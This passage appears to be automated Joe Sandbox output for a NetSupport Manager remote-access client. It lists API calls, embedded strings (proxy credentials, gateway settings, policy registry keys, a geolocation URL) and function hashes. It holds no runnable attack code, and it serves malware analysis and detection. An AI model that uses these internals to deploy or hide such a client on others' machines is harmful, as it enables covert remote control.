                                                                                          • GetProcAddress.KERNEL32(?,LoggedOn), ref: 11108EA6
                                                                                          • FreeLibrary.KERNEL32(?), ref: 11108ECB
                                                                                            • Part of subcall function 1110F2B0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                            • Part of subcall function 1110F2B0: CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                            • Part of subcall function 1110F2B0: WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                            • Part of subcall function 1110F2B0: CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                          • GetStockObject.GDI32(0000000D), ref: 11108EDF
                                                                                          • GetObjectA.GDI32(00000000,0000003C,?), ref: 11108EEF
                                                                                          • InitializeCriticalSection.KERNEL32(0000003C), ref: 11108F0B
                                                                                          • InitializeCriticalSection.KERNEL32(111F060C), ref: 11108F16
                                                                                            • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11189A56,000000FF), ref: 11107363
                                                                                            • Part of subcall function 11107290: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 111073B2
                                                                                          • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108F59
                                                                                            • Part of subcall function 1109E9E0: GetCurrentProcess.KERNEL32(00020008,00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA01
                                                                                            • Part of subcall function 1109E9E0: OpenProcessToken.ADVAPI32(00000000,?,?,110F7D14,00000001,111417B8,_debug,TraceCopyData,00000000,00000000,?,?,00000000,00000000), ref: 1109EA08
                                                                                            • Part of subcall function 1109E9E0: CloseHandle.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 1109EA27
                                                                                          • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FAA
                                                                                          • CloseHandle.KERNEL32(00000000,Function_00102C50,00000001,00000000), ref: 11108FFF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandle$Library$LoadObject$AddressCreateCriticalEventInitializeOpenProcProcessSection$CurrentDirectoryFreeSingleStockSystemThreadTokenWait_malloc_memsetwsprintf
                                                                                          • String ID: GrabKM$LPT1$LoggedOn$\pcigina$nsm_gina_sas
                                                                                          • API String ID: 3930710499-403456261
                                                                                          • Opcode ID: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                          • Instruction ID: 229803012459fbbe5cfd3a30b02a894d1af5bad55287ed163187595495ff030c
                                                                                          • Opcode Fuzzy Hash: 1bb63630e84e06d7a5d883501c08249baca6a639cf459e52fb6089e18ee58e4a
                                                                                          • Instruction Fuzzy Hash: DC81AFB4E0435AEFEB55DFB48C89B9AFBE9AB48308F00457DE569D7280E7309944CB11
                                                                                          APIs
                                                                                            • Part of subcall function 111450A0: GetVersionExA.KERNEL32(111F0EF0,75A78400), ref: 111450D0
                                                                                            • Part of subcall function 111450A0: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 1114510F
                                                                                            • Part of subcall function 111450A0: _memset.LIBCMT ref: 1114512D
                                                                                            • Part of subcall function 111450A0: _strncpy.LIBCMT ref: 111451FA
                                                                                          • PostMessageA.USER32(000404A0,000006CF,00000007,00000000), ref: 11138E0F
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • SetWindowTextA.USER32(000404A0,00000000), ref: 11138EB7
                                                                                          • IsWindowVisible.USER32(000404A0), ref: 11138F7C
                                                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,00000000), ref: 11138F9C
                                                                                          • IsWindowVisible.USER32(000404A0), ref: 11138FAA
                                                                                          • SetForegroundWindow.USER32(00000000), ref: 11138FD8
                                                                                          • EnableWindow.USER32(000404A0,00000001), ref: 11138FE7
                                                                                          • IsWindowVisible.USER32(000404A0), ref: 11139038
                                                                                          • IsWindowVisible.USER32(000404A0), ref: 11139045
                                                                                          • EnableWindow.USER32(000404A0,00000000), ref: 11139059
                                                                                          • EnableWindow.USER32(000404A0,00000000), ref: 11138FBF
                                                                                            • Part of subcall function 11131210: ShowWindow.USER32(000404A0,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                          • EnableWindow.USER32(000404A0,00000001), ref: 1113906D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$EnableVisible$Foreground$MessageOpenPostShowTextVersion__wcstoi64_memset_strncpy
                                                                                          • String ID: Client$ConnectedText$HideWhenIdle$LockedText$ShowUIOnConnect$ViewedText
                                                                                          • API String ID: 3453649892-3803836183
                                                                                          • Opcode ID: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                          • Instruction ID: ae8ec3c714d324370739ddb1cab1952d607c59122f5be0bb7ac7fd02d25128b2
                                                                                          • Opcode Fuzzy Hash: 391fd03a16533da79435ce5bee1303fc2e717428408a6b437c143b59ca9afbf1
                                                                                          • Instruction Fuzzy Hash: 86C12A75A1122A9BEB11DFF4CD80B6EF769ABC072DF140138EA159B28CEB75E804C751
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: %s:%s$*GatewayAddress$*PINServer$*UseWebProxy$*WebProxy$:%d$Gateway$Gateway_UseWebProxy$Gateway_WebProxy$P$PinProxy$ProxyCred$ProxyPassword$ProxyUsername$UsePinProxy$client247$r<^l
                                                                                          • API String ID: 2111968516-2245968893
                                                                                          • Opcode ID: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
                                                                                          • Instruction ID: 7efd35a4ae0c02fe8056c906006a5b9779c271741d730474cfeafd88f3de7ded
                                                                                          • Opcode Fuzzy Hash: a4e93b3c8ccc3a6b7aca88ff6a4ce5e76e438b27463c39e0fb5cbacf9f3d350e
                                                                                          • Instruction Fuzzy Hash: AD2288B2A04368ABDB24DF68CC80EEAB7B9EB49304F0485D9E54967A40D7315FC8CF51
                                                                                          APIs
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110281F1
                                                                                            • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                          • wsprintfA.USER32 ref: 11028214
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028259
                                                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 1102826D
                                                                                          • wsprintfA.USER32 ref: 11028291
                                                                                          • CloseHandle.KERNEL32(?), ref: 110282A7
                                                                                          • CloseHandle.KERNEL32(?), ref: 110282B0
                                                                                          • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028311
                                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028325
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                          • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                          • API String ID: 512045693-419896573
                                                                                          • Opcode ID: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                          • Instruction ID: 7a246749baaa4a6e23861a3fd22e5cd13303056935123195fcb9bb693944541c
                                                                                          • Opcode Fuzzy Hash: be2a4d539e06a764388bcf1fddbdd407ba59922a3a30c161602edf8e7ebb4000
                                                                                          • Instruction Fuzzy Hash: B841D678E04229ABD714CF65CCD5FEAB7B9EB44709F0081A5F95897280DA71AE44CBA0
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(PCIINV.DLL,F3EE1E80,03007D18,03007D08,?,00000000,1118276C,000000FF,?,11031942,03007D18,00000000,?,?,?), ref: 11085E45
                                                                                            • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                            • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                            • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                            • Part of subcall function 1110F520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EDC3F0,?,1111022D,00000000,00000001,?,?,?,?,?,11031040), ref: 1110F53E
                                                                                          • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11085E6B
                                                                                          • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11085E7F
                                                                                          • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11085E93
                                                                                          • wsprintfA.USER32 ref: 11085F1B
                                                                                          • wsprintfA.USER32 ref: 11085F32
                                                                                          • wsprintfA.USER32 ref: 11085F49
                                                                                          • CloseHandle.KERNEL32(00000000,11085C70,00000001,00000000), ref: 1108609A
                                                                                            • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085A98
                                                                                            • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085AAB
                                                                                            • Part of subcall function 11085A80: CloseHandle.KERNEL32(?,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085ABE
                                                                                            • Part of subcall function 11085A80: FreeLibrary.KERNEL32(00000000,7591F550,?,?,110860C0,?,11031942,03007D18,00000000,?,?,?), ref: 11085AD1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                                          • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                          • API String ID: 4263811268-2492245516
                                                                                          • Opcode ID: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                          • Instruction ID: c264ff3baa83c9e34b1ea5f373b83d9ca187d225ad452563e08076ac2ec7b834
                                                                                          • Opcode Fuzzy Hash: f5aef0daa14bc6ea66726438fc532167d4c8a127bd90decb683372eff0d319c6
                                                                                          • Instruction Fuzzy Hash: 40718175E0874AABEB14CF75CC46BDBFBE4AB48304F10452AE956D7280EB71A500CB95
                                                                                          APIs
                                                                                          • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 110305F3
                                                                                          • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 1103060A
                                                                                          • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 110306AC
                                                                                          • SetLastError.KERNEL32(00000078), ref: 110306C2
                                                                                          • WaitForSingleObject.KERNEL32(?,000001F4), ref: 110306FC
                                                                                          • CloseHandle.KERNEL32(?), ref: 11030709
                                                                                          • FreeLibrary.KERNEL32(?), ref: 11030714
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 1103071B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                          • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                          • API String ID: 2061479752-1320826866
                                                                                          • Opcode ID: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                          • Instruction ID: 4511418fabb8e143c6e2e60e2068ec6a59f08b67eb8208c825473cc9362a61df
                                                                                          • Opcode Fuzzy Hash: 344344da4f24c17c6c11c64113ed1526ed618b4690303f5ba055bceda43c688d
                                                                                          • Instruction Fuzzy Hash: 72613774E1635AAFEB10DFB09C44B9EB7B4AF8470DF1000A9D919A71C5EF70AA44CB51
                                                                                          APIs
                                                                                            • Part of subcall function 1110F340: SetEvent.KERNEL32(00000000,?,1102C44F), ref: 1110F364
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C455
                                                                                          • GetTickCount.KERNEL32 ref: 1102C47A
                                                                                            • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                          • GetTickCount.KERNEL32 ref: 1102C574
                                                                                            • Part of subcall function 110D1370: wvsprintfA.USER32(?,?,1102C511), ref: 110D139B
                                                                                            • Part of subcall function 110D07C0: _free.LIBCMT ref: 110D07ED
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C66C
                                                                                          • CloseHandle.KERNEL32(?), ref: 1102C688
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                          • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                          • API String ID: 596640303-1725438197
                                                                                          • Opcode ID: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                          • Instruction ID: 59613557395ae23f7967247d4baf4cae7550bfc3229e85cd4bc92fe2e2f2b4a8
                                                                                          • Opcode Fuzzy Hash: 609e97f705776535a990b82a8e5f18e172a35da44f01400c4fa73658ea828b55
                                                                                          • Instruction Fuzzy Hash: 6B818275E0020AABDF04DBE8CD94FEEF7B5AF59708F504258E82567284DB34BA05CB61
                                                                                          APIs
                                                                                          • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106175A
                                                                                            • Part of subcall function 11061140: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                            • Part of subcall function 11061140: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110617AB
                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11061865
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 11061881
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Enum$Open$CloseValue
                                                                                          • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                          • API String ID: 2823542970-1528906934
                                                                                          • Opcode ID: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                          • Instruction ID: 3a074a016260bf88f68c0586b8c591cabbb012c9b5ad66670ab8b6bf40d046b4
                                                                                          • Opcode Fuzzy Hash: 4cf0c36994a383612a719e249f3f276c0f36ade9332230c7c569e8670290d878
                                                                                          • Instruction Fuzzy Hash: 5F416179E4022DABD724CB55CC81FEAB7BCEB94748F1001D9EA48A6140D6B06E84CFA1
                                                                                          APIs
                                                                                            • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                          • GetTickCount.KERNEL32 ref: 11137692
                                                                                            • Part of subcall function 11096970: CoInitialize.OLE32(00000000), ref: 11096984
                                                                                            • Part of subcall function 11096970: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                            • Part of subcall function 11096970: CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                            • Part of subcall function 11096970: CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                          • GetTickCount.KERNEL32 ref: 111376A1
                                                                                          • _memset.LIBCMT ref: 111376E3
                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 111376F9
                                                                                          • _strrchr.LIBCMT ref: 11137708
                                                                                          • _free.LIBCMT ref: 1113775A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
